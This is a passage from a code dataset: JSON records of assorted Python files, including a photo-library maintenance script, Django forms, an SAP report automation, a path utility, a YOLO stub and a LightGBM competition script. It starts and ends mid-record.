type(session) != str and session[0] is None:\n logging.error(session[1])\n continue\n\n # get user counts\n client = instance['client']\n\n fetch_all_ds(inst_id, session, client, auth['userId'])","repo_name":"uninhibitedspirit/domo-automation","sub_path":"publish_reports/pick_domains.py","file_name":"pick_domains.py","file_ext":"py","file_size_in_byte":5366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6620083455","text":"#!/usr/bin/env python3\nimport argparse\nfrom collections import defaultdict\nimport os\nimport sqlite3\nimport subprocess\nimport sys\n\nimport Config\nfrom ExifUtils import from_exif_timestamp\nimport Metadata as MetadataModule\nfrom Storage import (\n Bool,\n Int,\n Json,\n Table,\n Timestamp,\n Txt,\n )\n\nstore = MetadataModule.Store()\n\ndef delete_path(path):\n try:\n os.remove(path)\n except:\n print(\"Failed to deleted\", path)\n pass\n\ndef upload_path(fname):\n return os.path.join(Config.upload_dir, fname)\n\ndef thumbnail_path(fname):\n return os.path.join(Config.thumbnail_dir, fname)\n\ndef ask(msg, options):\n inp = None\n while inp not in options:\n inp = input(msg)\n\n return inp\n\ndef same_file(fname1, fname2):\n path1 = upload_path(fname1)\n path2 = upload_path(fname2)\n assert(os.path.exists(path1))\n assert(os.path.exists(path2))\n\n cmd = [\"diff\", path1, path2]\n try:\n subprocess.check_output(cmd)\n except:\n return False\n return True\n\ndef process_possible_duplicates(matches):\n print(\"\")\n print(\"-----------------------\")\n\n for match in matches:\n print(match.fname)\n\n print()\n\n if all(same_file(matches[0].fname, other.fname) for other in matches[1:]):\n choice = ask(\"Duplicates detected. (d)elete all but first (k)eep all (q)uit? \", {\"d\", \"k\", \"q\"})\n if choice == \"q\":\n print(\"Quitting\")\n sys.exit(0)\n if choice == \"k\":\n print(\"Skipping\")\n return\n\n for match in matches[1:]:\n try:\n delete_path(upload_path(match.fname))\n delete_path(thumbnail_path(match.fname))\n print(\"Deleted successfully\")\n except:\n print(\"Failed to delete uploaded file or thumbnail\")\n\n store._delete(upload_path(match.fname), match.fname, match)\n\n else:\n print(\"Files are not duplicates. Not sure what to do\")\n choice = ask(\"(k)eep all (q)uit? 
\", {\"k\", \"q\"})\n if choice == \"q\":\n print(\"Quitting\")\n sys.exit(0)\n if choice == \"k\":\n print(\"Skipping\")\n return\n\n# -----------------------------------------------\n# Update actions\n\ndef duplicate_check():\n all_data = store.get_db_data(deleted=False, reverse=True)\n\n grouped_data = defaultdict(list)\n\n for row in all_data:\n key = (row.exif['FileSize'],\n row.hash_sha256)\n grouped_data[key].append(row)\n\n for key, matches in grouped_data.items():\n if len(matches) == 1:\n continue\n \n process_possible_duplicates(matches)\n\ndef update_thumbnails(fnames):\n def get_data(fnames):\n if fnames:\n for fname in fnames:\n yield store.get_db_data_fname(fname)\n else:\n all_data = store.get_db_data(deleted=False)\n for item in all_data:\n yield item\n\n with store.batch():\n for entry in get_data(fnames):\n old_thumbnail_path = entry.thumbnail\n thumbnail_path = MetadataModule.Store.thumbnail(Config.upload_path(entry.fname), entry.fname)\n if old_thumbnail_path != thumbnail_path and old_thumbnail_path:\n delete_path(old_thumbnail_path)\n store.metadata.update({\"thumbnail\": thumbnail_path}, {\"fname\": entry.fname})\n\n# -----------------------------------\n# Map data to this new Metadata\n# format\nclass Metadata(Table):\n fields = [\n Txt(\"fname\"),\n Txt(\"hash_sha256\"),\n Timestamp(\"time_db_added\"),\n Timestamp(\"time_db_updated\"),\n Bool(\"deleted\"),\n Txt(\"desc\"),\n Json(\"exif\"), # exiftool -json data\n Txt(\"mime_type\"),\n Timestamp(\"file_ts\"), # timestamp for the file\n Txt(\"thumbnail\"),\n Json(\"tags\"),\n ]\n\ndef translate_row(old_row):\n \"\"\"Translate a row of data from the old format\n MetadataModule.Metadata to Metadata table defined\n in this file\"\"\"\n file_ts = from_exif_timestamp(old_row.exif.get('DateTimeOriginal'),\n old_row.exif.get('CreateDate'),\n old_row.exif.get('TrackCreateDate'),\n old_row.exif.get('SubSecCreateDate'),\n old_row.exif.get('FileModifyDate'),\n )#old_row.exif_img_create_date)\n new_row = list(old_row)[:-3] + [file_ts] + list(old_row)[-2:]\n return new_row\n\ndef map_data(new_file):\n assert not os.path.exists(new_file), \"New file must not exist\"\n\n old_file = Config.metadata_file\n old_conn = sqlite3.connect(old_file)\n old_cursor = old_conn.cursor()\n old_table = MetadataModule.Metadata(old_cursor)\n old_data = old_table.get('*')\n old_cursor.close()\n old_conn.close()\n\n new_conn = sqlite3.connect(new_file)\n new_cursor = new_conn.cursor()\n new_table = Metadata(new_cursor)\n\n new_columns = new_table.columns()\n for idx, old_row in enumerate(old_data):\n new_row = translate_row(old_row)\n new_table.insert(**dict(zip(new_columns, new_row)))\n\n new_conn.commit()\n print(\"Copied {} rows\".format(idx))\n\ndef main(args):\n if args.map_data:\n assert not args.paths, \"Can't specify upload file paths with --map-data\"\n map_data(args.map_data)\n return\n\n if args.duplicate_check:\n assert not args.paths\n duplicate_check()\n return\n\n if args.update_thumbnails:\n fnames = [os.path.split(path)[1] for path in args.paths]\n update_thumbnails(fnames)\n return\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-d\", \"--duplicate-check\",\n action=\"store_true\")\n parser.add_argument(\"-t\", \"--update-thumbnails\",\n action=\"store_true\")\n parser.add_argument(\"--map-data\", metavar=\"NEW_SQLITE3_FILE\")\n parser.add_argument(\"paths\", nargs=\"*\")\n args = parser.parse_args()\n 
main(args)\n","repo_name":"sbirmi/file-browser","sub_path":"src/UpdateScript.py","file_name":"UpdateScript.py","file_ext":"py","file_size_in_byte":6113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70404780995","text":"#forms.py for tour app\n#forms.py\nfrom django import forms\nfrom django.contrib.auth.models import User\nfrom .models import tour_user, Tour, stops #relative import\n\n\nclass UserForm(forms.ModelForm):\n # username = forms.CharField(help_text=\"Please enter a username.\")\n # email = forms.CharField(help_text=\"Please enter your email.\")\n # password = forms.CharField(widget=forms.PasswordInput(), help_text=\"Please enter a password.\")\n\n class Meta:\n model = User\n fields = ['first_name', 'last_name', 'email']\n\nclass tour_user_Form(forms.ModelForm):\n class Meta:\n model = tour_user\n fields = [\n \"User_Gender\",\n \"about_you\",\n \"phone_number\",\n \"profile_picture\",\n \"languages\",\n \"work\",\n \"hometown\",\n \"alma_meter\",\n \"hobbies\",\n ]\n \n\n\nclass Tour_Form(forms.ModelForm):\n class Meta:\n model = Tour\n fields = [\n \"title\",\n \"country\",\n \"state\",\n \"cityname\",\n \"tour_theme\",\n \"capacity\",\n #\"duration\",\n \"tour_intensity\",\n \"image\",\n \"content\",\n \"description\",\n \"draft\",\n ]\n\nclass Stop_Form(forms.ModelForm):\n class Meta:\n model = stops\n fields = [\n \"image\",\n \"content\",\n ]\n\n\n","repo_name":"hannahmshin/Venture_Web","sub_path":"src/src/tour/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"6621471562","text":"import win32com.client as win\nimport pandas as pd\nfrom datetime import datetime\nimport subprocess,pyautogui\nimport time,os\nimport xlwings as xl\nos.system(\"TASKKILL /F /IM saplogon.exe\")\nos.system(\"TASKKILL /F /IM excel.exe\")\ntime.sleep(3)\nsubprocess.Popen([r\"C:\\Program Files (x86)\\SAP\\FrontEnd\\SAPgui\\saplogon.exe\"],shell=True)\ntime.sleep(5)\ngui=win.GetObject('SAPGUI')\ntoday=datetime.today().strftime('%m.%d.%y')\noor_file=\"OOR \"+today+\".XLSX\"\napplication=gui.GetScriptingEngine\npyautogui.press('down')\npyautogui.press('down')\npyautogui.press('enter')\ntime.sleep(5)\npyautogui.press('enter')\ntime.sleep(2)\npyautogui.typewrite('ZQ2COPENSO\\\n')\nfor i in range(8):\n pyautogui.press('down')\npyautogui.typewrite('3321')\npyautogui.press('tab')\npyautogui.typewrite('3322')\nfor i in range(3):\n pyautogui.press('tab')\npyautogui.press('down')\npyautogui.press('tab')\npyautogui.press('enter')\ntime.sleep(120)\n\n\nsubprocess.call(['cscript.exe',r\"C:\\Users\\ajarabani\\Downloads\\PYTHON\\SAP OOR.vbs\"])\nmtime=os.path.getmtime(r\"C:\\Users\\ajarabani\\Downloads\\OOR.XLSX\")\nwhile True:\n if time.time()-mtime<60:\n break\n time.sleep(1)\nwb=xl.Book(r\"C:\\Users\\ajarabani\\Downloads\\OOR.XLSX\")\nws=wb.sheets.active\ndata_range=ws.used_range\ndf=pd.DataFrame(data_range.value)\ndf.columns=df.iloc[0]\ndf=df[1:]\ndf=df[['Order Type','Shipping plant','Ship-to name','Sale Order number','Material','Material Description','First date','Delv Schedule line date','Schedule Line Quantity','Unit price','Open SO quantity','Sold to name','Ship-to Country','Current Cust Need By date','Rejection reason code']]\ndf=df.loc[~df['Order Type'].str.contains('ZKB|ZLBO|ZRO')]\ndf=df.loc[df['Rejection reason code'].isna()]\ndf=df.loc[df['Open SO quantity']!=0]\ntry:\n df['Open SO 
quantity'].astype(float)\nexcept:\n df['Open SO quantity']=df['Open SO quantity']+','\n df['Open SO quantity']=df['Open SO quantity'].str.replace(',','')\n df['Open SO quantity']=df['Open SO quantity'].astype(float)\ndf['Delv Schedule line date']=pd.to_datetime(df['Delv Schedule line date'], format='%Y-%m-%d %H:%M:%S').dt.strftime('%m/%d/%Y')\ndf.to_pickle('OOR.PKL')\nprint('OOR.PKL COMPLETE')\nos.system(\"TASKKILL /F /IM saplogon.exe\")\nos.system(\"TASKKILL /F /IM excel.exe\")","repo_name":"AnveshJarabani/END-END-ETL-PIPELINES","sub_path":"PY_REPO/SAP_OOR_PULL.py","file_name":"SAP_OOR_PULL.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25853354870","text":"from __future__ import annotations\nfrom functools import cached_property\n\nimport os\nfrom pathlib import Path\nimport platform\nfrom typing import Literal\nimport string\n\nLOCALHOST: tuple[Literal['127.0.0.1', 'localhost']] = (\"127.0.0.1\", \"localhost\")\nSERVER_PORT = 3031\nPORT_RANGE = [49200, 65535]\n\nPLATFORM = platform.system()\n\nlivereload_script = string.Template(\n \"\"\"\n\n\"\"\"\n)\n\ndef path_exists_case_sensitive(p: str|Path) -> bool:\n \"\"\"Check if path exists, enforce case sensitivity.\n\n Arguments:\n p: Path to check\n Returns:\n Boolean indicating if the path exists or not\n \"\"\"\n p = Path(p)\n # If it doesn't exist initially, return False\n if not p.exists():\n return False\n\n # Else loop over the path, checking each consecutive folder for\n # case sensitivity\n while True:\n # At root, p == p.parent --> break loop and return True\n if p == p.parent:\n return True\n # If string representation of path is not in parent directory, return False\n if str(p) not in map(str, p.parent.iterdir()):\n return False\n p = p.parent\n\n\ndef default(root: str, src: str) -> list[str]:\n if src.endswith((\".css\", \".js\")):\n return [translate_path(root, src), \"**\"]\n return [translate_path(root, src)]\n\ndef translate_path(root, src) -> str:\n path = ServerPath(src).lstrip().lstrip(root)\n \n if len(path.parents) == 0:\n return \"/\"\n if path.isfile():\n path = path.parent.normpath()\n return path.posix() + \"/\"\n path = path.normpath()\n return path.posix() + \"/\"\n\nclass ServerPath:\n \"\"\"Path object for the live reload server. Keeps the seperators as `/` and does a lot of extra\n work for normalizing the path. It also has a case sensitive check for if the path exists. This\n is needed for windows systems.\n \"\"\"\n\n def __init__(self, *paths: str) -> None:\n flat = []\n for p in paths:\n if isinstance(p, (list, set, tuple)):\n flat.extend(p)\n else:\n flat.append(p)\n\n self.path = \"/\".join(str(p) for p in flat if p != \"\").replace(\"\\\\\", \"/\").replace(\"//\", \"/\")\n if len(self.path) > 2:\n self.path = self.path.replace(\"./\", \"\")\n\n @property\n def parent(self) -> ServerPath:\n \"\"\"Return a new ServerPath instance that represents the parent directory.\"\"\"\n parts = self.path.rsplit(\"/\", 1)\n if len(parts) > 1:\n if parts[0] != \"\":\n return ServerPath(parts[0], \"/\")\n return ServerPath(parts[0])\n else:\n return ServerPath(\"\")\n\n @property\n def parents(self) -> list[str]:\n \"\"\"Return a list of all the parent directories.\"\"\"\n return self.path.split(\"/\")[:-1]\n\n @cached_property\n def name(self) -> str:\n \"\"\"Name of the file/directory path. 
This is the last named segment of the path.\"\"\"\n return self.path.rsplit(\"/\", 1)[-1].split(\".\", 1)[0]\n\n @cached_property\n def suffix(self) -> str:\n \"\"\"Suffix of the file path. None if no file extension is found.\"\"\"\n parts = self.path.rsplit(\"/\", 1)[-1].split(\".\", 1)\n if len(parts) > 1:\n return f\".{parts[-1]}\"\n else:\n return None\n\n def with_suffix(self, suffix: str = \"\"):\n \"\"\"Replace the file path's suffix. Either an extension or blank for removing the extension.\n \"\"\"\n suffix = f\".{suffix}\" if not suffix.startswith(\".\") and suffix != \"\" else suffix\n parts = self.path.rsplit(\"/\", 1)\n if len(parts) > 1:\n self.path = parts[0] + \"/\" + self.name.split(\".\", 1)[0] + suffix\n else:\n self.path = parts[0].split(\".\", 1)[0] + suffix\n return self\n\n def with_name(self, name: str):\n \"\"\"Replace the path's name. Either the file path name or the directory name.\"\"\"\n trail = \"/\" if self.path.endswith(\"/\") else \"\"\n parts = self.path.rstrip(\"/\").rsplit(\"/\", 1)\n\n suffix_parts = parts[-1].split(\".\", 1)\n suffix = f\".{suffix_parts[-1]}\" if len(suffix_parts) > 1 else \"\"\n\n if len(parts) > 1:\n self.path = parts[0] + \"/\" + name + suffix + trail\n else:\n self.path = name + suffix + trail\n return self\n\n def relative_to(self, rel_path: str) -> ServerPath:\n \"\"\"Calculate the path to the relative path assuming that the current path's root is the\n current directory.\n \"\"\"\n parents = self.parents\n\n rel_path = rel_path.replace(\"\\\\\", \"/\").replace(\"//\", \"/\").split(\"/\")\n parent_pos = len(parents)\n for i, part in enumerate(rel_path):\n if part == \"..\":\n parent_pos -= 1\n if parent_pos < 0:\n raise IndexError(f\"Can't have a relative path that is outside the outermost \\\nscope of the current path {self.posix()!r}\")\n else:\n return ServerPath(*parents[:parent_pos], *rel_path[i:])\n return ServerPath(*parents[:parent_pos])\n\n def regex(self) -> str:\n \"\"\"Replace ** with .* and * with [^/]* in the path.\"\"\"\n parts = []\n for part in self.path.split(\"/\"):\n if part == \"**\":\n parts.append(\".*\")\n else:\n parts.append(part.replace(\"*\", \"[^/]*\"))\n return \"/\".join(parts)\n \n def strip(self, text: str = \"/\"):\n \"\"\"Remove a substring from the start and end of the path.\"\"\"\n self.path = self.path.strip(text)\n return self\n\n def rstrip(self, end: str = \"/\"):\n \"\"\"Remove a substring from the end of the path.\"\"\"\n self.path = self.path.rstrip(end)\n return self\n\n def lstrip(self, start: str = \"/\"):\n \"\"\"Remove a substring from the start of the path.\"\"\"\n self.path = self.path.lstrip(start)\n return self\n\n def normpath(self):\n \"\"\"Remove leading and trailing `/` and replace all double slashes with single slashes.\"\"\"\n self.path = self.path.strip(\"/\").replace(\"//\", \"/\")\n return self\n\n def join(self, *paths) -> ServerPath:\n \"\"\"Return a new ServerPath instance with the current path joined with the passed in paths.\n \"\"\"\n return ServerPath(self.path, *paths)\n\n def exists(self) -> bool:\n \"\"\"Check if the path exists. Either file or directory.\"\"\"\n return path_exists_case_sensitive(self.path)\n\n def isdir(self) -> bool:\n \"\"\"Check if the path is a directory. Ignores if it exists.\"\"\"\n return os.path.isdir(self.path) and self.exists()\n\n def isfile(self) -> bool:\n \"\"\"Check if the path is a file. 
Ignores if it exists.\"\"\"\n return os.path.isfile(self.path) and self.exists()\n\n def posix(self) -> str:\n \"\"\"Get the string representation of the path.\"\"\"\n return self.path if self.path != \"\" else \".\"\n\n def win(self) -> str:\n \"\"\"Get the windows representation of the path.\"\"\"\n return self.path.replace(\"/\", \"\\\\\") if self.path != \"\" else \".\"\n\n def platform(self) -> str:\n \"\"\"Returns the stringified version of the path with the separators that match the current\n operating system.\n \"\"\"\n if PLATFORM == \"Windows\":\n return self.win()\n return self.posix()\n\n def __repr__(self) -> str:\n return f\"ServerPath({self.path!r})\"\n\n def __str__(self) -> str:\n return self.path\n\nif __name__ == \"__main__\":\n print(ServerPath(\"*/**/rainbow\").regex())\n print(Path(\"Server.py\").exists())\n","repo_name":"Tired-Fox/watchserver","sub_path":"watchserver/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":8477,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"3986659604","text":"#!/usr/bin/env python3\n\n\"\"\"\nClass Yolo that uses Yolo v3\nalgorithm to perform object\ndetection\nThis class aims to create a base\nstructure that will serve as the\nfoundation for the following tasks.\n\"\"\"\n\nimport tensorflow.keras as K\nimport numpy as np\n\n\nclass Yolo:\n \"\"\"\n Yolo class uses algorithm Yolo v3 to complete\n object detection in images and videos.\n Objects are classified within a frame.\n The purpose of this class is to allow for user-friendly\n usage of YOLOv3 by encapsulating model loading,\n class info, and parameter config.\n \"\"\"\n\n def __init__(self, model_path, classes_path, class_t, nms_t, anchors):\n \"\"\"Adding expected parameters\n Args:\n model_path: path to pretrained Yolo model\n classes_path: list of class names\n class_t: box score threshold for filtering\n nms_t: IOU threshold for non max suppression\n anchors: anchor for box info\n \"\"\"\n self.model = K.models.load_model(model_path)\n with open(classes_path) as file:\n class_names = file.read()\n self.class_names = class_names.replace(\"\\n\", \"|\").split(\"|\")[:-1]\n self.class_t = class_t\n self.nms_t = nms_t\n self.anchors = anchors\n","repo_name":"jobabyyy/holbertonschool-machine_learning","sub_path":"supervised_learning/object_detection/0-yolo.py","file_name":"0-yolo.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23554284561","text":"infile = open(\"B-large.in\", \"r\")\r\nlines = infile.readlines()\r\noutfile = open(\"out.out\", \"w\")\r\ntc = int(lines[0])\r\n\r\n\r\nfor t in range(tc):\r\n\tn = lines[t+1].strip()\t\r\n\ti = len(n) - 1\r\n\r\n\twhile(i >= 1):\r\n\t\tif n[i] < n[i-1]:\t\r\n\t\t\tnines = \"\"\r\n\t\t\tfor x in range(i+1, len(n)):\r\n\t\t\t\tnines = nines + \"9\"\t\t\r\n\t\t\tn = n[0:i-1] + str(int(n[i-1]) - 1) + \"9\" + nines\r\n\t\ti -= 1\r\n\r\n\toutfile.write(\"Case #\" + str(t+1) + \": \" + str(n.lstrip('0')) + \"\\n\")\r\n\t\t\t","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/1998.py","file_name":"1998.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4632862093","text":"'''\nLayout file for Benford's law validator webapp\n'''\n\nimport dash_bootstrap_components as dbc\nimport dash_core_components as dcc\nimport 
dash_html_components as html\n\n# Layout for new data card\nnewFile = dbc.Card(\n [\n dbc.FormGroup(\n [\n dbc.Label(\"Load New File\"),\n dcc.Upload(\n id=\"upload-data\",\n children=html.Div([\"Drag and Drop or \", html.A(\"Select File\")]),\n style={\n \"width\": \"100%\",\n \"height\": \"40px\",\n \"lineHeight\": \"40px\",\n \"borderWidth\": \"1px\",\n \"borderStyle\": \"dashed\",\n \"borderRadius\": \"5px\",\n \"textAlign\": \"center\",\n # \"margin\": \"10px\",\n },\n multiple=False,\n ),\n html.Div(id=\"output-data-upload\"),\n dcc.Dropdown(\n id=\"selectcolumn-dropdown\",\n placeholder=\"Select column\",\n ),\n ],\n ),\n ],\n body=True,\n)\n\n# Layout for historical data card\noldData = dbc.Card(\n [\n dbc.FormGroup(\n [\n dbc.Label(\"Or Select Historical Dataset\"),\n dcc.Dropdown(\n id=\"history-dropdown\",\n options=[],\n placeholder=\"Select historical dataset\",\n ),\n ],\n ),\n ],\n body=True,\n)\n\n# Layout for new data tab\nnew_data_tab = (\n newFile,\n html.Div(id=\"output-data-results-new\"),\n)\n\n# Layout for historical data tab\nhistorical_data_tab = (\n oldData,\n html.Div(id=\"output-data-results-historical\"),\n)\n\n# Main layout\nmainLayout = dbc.Container(\n children=[\n html.H1(children=\"Benford's Law Validator\"),\n html.Hr(),\n dbc.Tabs(\n [\n dbc.Tab(new_data_tab, label=\"New Data\"),\n dbc.Tab(historical_data_tab, label=\"Historical Data\"),\n ]\n ),\n dcc.Store(id=\"memory-output\"),\n ],\n fluid=True,\n className=\"p-5\",\n)","repo_name":"kctlau/benford","sub_path":"layout.py","file_name":"layout.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4381597393","text":"#coding=UTF-8\ng =filter(lambda x:x % 2 ==0,list(range(1,101)))\nprint(list(g))\n\n'''\n用位置匹配参数,关键字匹配参数,收集匹配参数分别写四个函数\n'''\ndef func1(arg1,arg2,arg3):\n\tresult = [arg1,arg2,arg3]\n\treturn result\n\t\ndef func2(arg1 = 'a',arg2 = 'b',arg3 = 'c'):\n\treturn [arg1,arg2,arg3]\ndef func3(*kargs):\n\t'该方法返回输入的任意个列表中所有元素的最大值'\n\tkargs=list(kargs)\n\tfor i in range(1,len(kargs)):\n\t\tkargs[0].extend(kargs[i])\t\n\treturn max(kargs[0])\ndef func4(**kwargs):\n\treturn kwargs\n\t\n\n\ndef func5(i):\n\tif i<100:\n\t\treturn i + func5(i+1)\n\treturn i\nprint (func5(0))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n\tassert func1(1,2,3) == [1,2,3]\n\tassert func2(arg2 =1,arg1 =2,arg3 =3) == [2,1,3]\n\tassert func4(apple ='fruit',cabbage ='vegetable')=={'apple':'fruit','cabbage':'vegetable'}\n\tassert func3([1,2,3],[1,5,65],[33,445,22])== 445\n\t'''\n\t要注意keywords不能为表达式,如:\n\t这里前面函数参数那块不能加引号,而输出的字典结果会自动加上引号。\n\t'''\n\t","repo_name":"winynfuck/PYdemo","sub_path":"python基础代码/老鱼python习题代码/进阶习题四.py","file_name":"进阶习题四.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26612782285","text":"# -*- coding: utf-8 -*-\r\n# Inspired by tianchi.aliyun.com/notebook-ai/detail?postId=44844\r\nimport warnings\r\nwarnings.filterwarnings('ignore')\r\nimport time\r\nimport re\r\nimport numpy as np\r\nimport pandas as pd\r\nimport lightgbm as lgb\r\nfrom tqdm import tqdm\r\nfrom sklearn.model_selection import KFold, RepeatedKFold\r\nfrom sklearn.metrics import mean_squared_error\r\n\r\n# Load Dataset\r\nt0 = time.time()\r\ntrain = pd.read_csv('./data/jinnan_round1_train_20181227.csv', encoding='gb18030')\r\ntest = pd.read_csv('./data/jinnan_round1_testB_20190121.csv', encoding='gb18030')\r\nprint(f'Data 
Loaded in {(time.time()-t0):.1f} s !')\r\nprint('------------------------------------')\r\n\r\n# Processing Anomalies and Combining Dataset\r\nt0 = time.time()\r\ntrain = train[train['收率'] > 0.87]\r\ntrain.loc[train['B14'] == 40, 'B14'] = 400\r\ntrain = train[train['B14']>=400]\r\ntrain.loc[train['A25'] == '1900/3/10 0:00', 'A25'] = train['A25'].value_counts().values[0]\r\ntrain['A25'] = train['A25'].astype(int)\r\ntarget = train.pop('收率')\r\ntest_id = test['样本id']\r\ndata = pd.concat([train, test], axis=0, ignore_index=True)\r\ndata = data.fillna(-1)\r\ndata['样本id'] = data['样本id'].apply(lambda x: x.split('_')[1])\r\ndata['样本id'] = data['样本id'].astype(int)\r\nprint(f'Anomalies Processed in {(time.time()-t0):.1f} s !')\r\nprint('------------------------------------')\r\n\r\n# Processing Special Case\r\nprint('Special Value(B14) Processing...')\r\ntest_select = {}\r\nfor v in [280, 360, 385, 390, 785]:\r\n\tprint(v)\r\n\tprint(test[test['B14'] == v]['样本id'])\r\n\ttest_select[v] = test[test['B14'] == v]['样本id'].index\r\nprint('Special Value(B14) Processed!')\r\nprint('------------------------------------')\r\n\r\n# Processing TimeData\r\nt0 = time.time()\r\ndef timeTranSecond(t):\r\n\ttry:\r\n\t\tt, m, s = t.split(\":\")\r\n\texcept:\r\n\t\tif t == '1900/1/9 7:00':\r\n\t\t\treturn 7 * 3600 / 3600\r\n\t\telif t == '1900/1/1 2:30':\r\n\t\t\treturn (2 * 3600 + 30 * 60) / 3600\r\n\t\telif t == -1:\r\n\t\t\treturn -1\r\n\t\telse:\r\n\t\t\treturn 0\r\n\ttry:\r\n\t\ttm = (int(t) * 3600 + int(m) * 60 + int(s)) / 3600\r\n\texcept:\r\n\t\treturn (30 * 60) / 3600\r\n\treturn tm\r\n\r\nfor f in ['A5', 'A7', 'A9', 'A11', 'A14', 'A16', 'A24', 'A26', 'B5', 'B7']:\r\n\ttry:\r\n\t\tdata[f] = data[f].apply(timeTranSecond)\r\n\texcept:\r\n\t\tprint(f, '应该在前面被删除了!')\r\n\r\ndef getDuration(se):\r\n\ttry:\r\n\t\tsh, sm, eh, em = re.findall(r\"\\d+\\.?\\d*\", se)\r\n\texcept:\r\n\t\tif se == -1:\r\n\t\t\treturn -1\r\n\ttry:\r\n\t\tif int(sh) > int(eh):\r\n\t\t\ttm = (int(eh) * 3600 + int(em) * 60 - int(sm) * 60 - int(sh) * 3600) / 3600 + 24\r\n\t\telse:\r\n\t\t\ttm = (int(eh) * 3600 + int(em) * 60 - int(sm) * 60 - int(sh) * 3600) / 3600\r\n\texcept:\r\n\t\tif se == '19:-20:05':\r\n\t\t\treturn 1\r\n\t\telif se == '15:00-1600':\r\n\t\t\treturn 1\r\n\treturn tm\r\n\r\nfor f in ['A20', 'A28', 'B4', 'B9', 'B10', 'B11']:\r\n\tdata[f] = data.apply(lambda df: getDuration(df[f]), axis=1)\r\nprint(f'Time Features Processed in {(time.time()-t0):.1f} s !')\r\nprint('------------------------------------')\r\n\r\n# Dataset Preparation for Differential\r\ntrain = data[:train.shape[0]]\r\ntest = data[train.shape[0]:]\r\ntrain['target'] = list(target)\r\nnew_train = train.copy()\r\nnew_train = new_train.sort_values(['样本id'], ascending=True)\r\ntrain_copy = train.copy()\r\ntrain_copy = train_copy.sort_values(['样本id'], ascending=True)\r\n# Train + Train = 2 x Train\r\ntrain_len = len(new_train)\r\nnew_train = pd.concat([new_train, train_copy])\r\n# Test + 2 x Train\r\ntest_len = len(test)\r\nnew_test = test.copy()\r\nnew_test = pd.concat([new_test, new_train])\r\n\r\n# Dataset Differential\r\n# New Trainset\r\ndiff_train = pd.DataFrame()\r\nids = list(train_copy['样本id'].values)\r\nfor i in tqdm(range(1, train_len)):\r\n\t# Interval of -1, -2, ... 
-len Rows\r\n\tdiff_tmp = new_train.diff(-i)\r\n\tdiff_tmp = diff_tmp[:train_len]\r\n\tdiff_tmp.columns = [col_ + '_difference' for col_ in diff_tmp.columns.values]\r\n\tdiff_tmp['样本id'] = ids\r\n\tdiff_train = pd.concat([diff_train, diff_tmp])\r\n# New Testset\r\ndiff_test = pd.DataFrame()\r\nids_test = list(test['样本id'].values)\r\nfor i in tqdm(range(test_len, test_len+train_len)):\r\n\t# Interval of -test_len , -test_len -1 ,.... -test_len - train_len +1 Rows\r\n\tdiff_tmp = new_test.diff(-i)\r\n\tdiff_tmp = diff_tmp[:test_len]\r\n\tdiff_tmp.columns = [col_ + '_difference' for col_ in diff_tmp.columns.values]\r\n\tdiff_tmp['样本id'] = ids_test\r\n\tdiff_test = pd.concat([diff_test, diff_tmp])\r\n\tdiff_test = diff_test[diff_train.columns]\r\n# Target\r\ntrain_target = train['target']\r\ntrain.drop(['target'], axis=1, inplace=True)\r\n# Combine Original Dataset and Differential Dataset\r\ndiff_train = pd.merge(diff_train, train, how='left', on='样本id')\r\ndiff_test = pd.merge(diff_test, test, how='left', on='样本id')\r\ntarget = diff_train['target_difference']\r\ndiff_train.drop(['target_difference'], axis=1, inplace=True)\r\ndiff_test.drop(['target_difference'], axis=1, inplace=True)\r\n\r\n# Model Run\r\nX_train = diff_train\r\ny_train = target\r\nX_test = diff_test\r\nparam = {'num_leaves': 31,\r\n\t\t 'min_data_in_leaf': 20,\r\n\t\t 'objective': 'regression',\r\n\t\t 'max_depth': -1,\r\n\t\t 'learning_rate': 0.01,\r\n\t\t \"boosting\": \"gbdt\",\r\n\t\t \"feature_fraction\": 0.9,\r\n\t\t \"bagging_freq\": 1,\r\n\t\t \"bagging_fraction\": 0.9,\r\n\t\t \"bagging_seed\": 11,\r\n\t\t \"metric\": 'mse',\r\n\t\t \"num_threads\": 8,\r\n\t\t \"verbosity\": -1}\r\nfolds = KFold(n_splits=5, shuffle=True, random_state=2018)\r\noof_lgb = np.zeros(len(diff_train))\r\npredictions_lgb = np.zeros(len(diff_test))\r\nfor fold_, (trn_idx, val_idx) in enumerate(folds.split(X_train, y_train)):\r\n\tprint(\"fold n°{}\".format(fold_ + 1))\r\n\tdev = X_train.iloc[trn_idx]\r\n\tval = X_train.iloc[val_idx]\r\n\ttrn_data = lgb.Dataset(dev, y_train.iloc[trn_idx])\r\n\tval_data = lgb.Dataset(val, y_train.iloc[val_idx])\r\n\tnum_round = 3000\r\n\tclf = lgb.train(param, trn_data, num_round, valid_sets=[trn_data, val_data], verbose_eval=100, early_stopping_rounds=100)\r\n\toof_lgb[val_idx] = clf.predict(val, num_iteration=clf.best_iteration)\r\n\tpredictions_lgb += clf.predict(X_test, num_iteration=clf.best_iteration) / folds.n_splits\r\n\r\n# Get Original Train Target\r\ndiff_train['compare_id'] = diff_train['样本id'] - diff_train['样本id_difference']\r\ntrain['compare_id'] = train['样本id']\r\ntrain['compare_target'] 